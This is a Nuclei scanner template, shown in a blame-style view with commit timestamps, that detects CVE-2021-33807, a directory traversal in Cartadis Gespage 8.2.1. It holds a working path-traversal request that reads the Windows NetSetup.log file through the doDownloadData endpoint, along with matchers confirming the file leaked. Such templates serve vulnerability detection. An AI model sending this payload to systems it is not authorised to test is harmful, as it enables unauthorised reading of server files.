nuclei-templates/cves/2021/CVE-2021-33807.yaml

34 lines
870 B
YAML
Raw Normal View History

2021-08-15 23:47:24 +00:00
id: CVE-2021-33807
info:
2021-08-15 23:47:56 +00:00
name: Cartadis Gespage 8.2.1 - Directory Traversal
2021-08-15 23:47:24 +00:00
author: daffainfo
severity: high
description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.
reference:
2021-08-15 23:47:24 +00:00
- https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807
tags: cve,cve2021,lfi
requests:
- method: GET
path:
2021-08-16 08:25:31 +00:00
- "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"
2021-08-15 23:47:24 +00:00
matchers-condition: and
matchers:
2021-08-16 08:25:31 +00:00
- type: word
words:
- "NetpDoDomainJoin:"
part: body
- type: word
words:
- "application/octet-stream"
part: header
2021-08-15 23:47:24 +00:00
- type: status
status:
- 200